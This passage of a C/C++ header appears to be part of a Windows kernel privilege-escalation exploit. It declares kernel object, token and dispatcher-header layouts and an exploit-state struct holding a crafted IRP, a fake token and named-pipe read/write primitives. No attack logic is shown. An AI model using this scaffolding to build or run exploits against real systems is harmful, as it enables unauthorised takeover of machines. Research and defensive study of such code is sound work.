            UCHAR DeletedInline : 1; //0x1b
        };
    };
    ULONG Reserved; //0x1c
    union {
        struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20
        VOID* QuotaBlockCharged; //0x20
    };
    VOID* SecurityDescriptor; //0x28
    struct _TOKEN Body; //0x30
};

// Per-run exploit state shared with the .cpp: crafted IRP / stack-location
// buffers, user-mode copies of the token sub-structures, and a set of
// named-pipe and file handles. The *IM / *RW and *Primitive* names suggest
// pipe-backed impersonation and read/write primitives, but nothing in this
// header shows how they are used -- see the .cpp.
struct mm {
    void* fake_data_entry;
    void* input;
    _IRP* crafted_irp;
    IO_STACK_LOCATION *crafted_arbitrary_io_stack_location;
    void* p_mem_0x30;
    void* p_mem_0xD0_2;
    _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes;
    ACL* VariablePartDefaultDacl;
    ACL* VariablePartDefaultDacl2;
    _ERESOURCE* TokenLock;
    void* PrimaryGroup;
    int sizeOfClientTokenAndObjectHeader;
    PSEP_SID_VALUES_BLOCK TokenSidValues;
    _SECURITY_CLIENT_CONTEXT* security_client_context;
    _SEP_LOGON_SESSION_REFERENCES* LogonSession;
    _TOKEN* fakeToken;
    void *pipe_100_im_control_block;
    void* pipe_100_rw_control_block;
    void* p_mem_Pipe_hToPipe_1000_rw;
    void* p_mem_Pipe_hToPipe_1000_rw_2;
    HANDLE hPipeIM;
    HANDLE hPipeRW;
    HANDLE hFileIM;
    HANDLE hFileRW;
    HANDLE IncPrimitiveTOKEN;
    HANDLE RWPrimitiveTOKEN;
};

// Dispatcher-object header (presumably for the _KEVENT that _IRP.UserEvent
// points at).
//0x18 bytes (sizeof)
struct _DISPATCHER_HEADER {
    union {
        volatile LONG Lock; //0x0
        LONG LockNV; //0x0
        struct {
            UCHAR Type; //0x0
            UCHAR Signalling; //0x1
            UCHAR Size; //0x2
            UCHAR Reserved1; //0x3
        };
        struct {
            UCHAR TimerType; //0x0
            union {
                UCHAR TimerControlFlags; //0x1
                struct {
                    UCHAR Absolute : 1;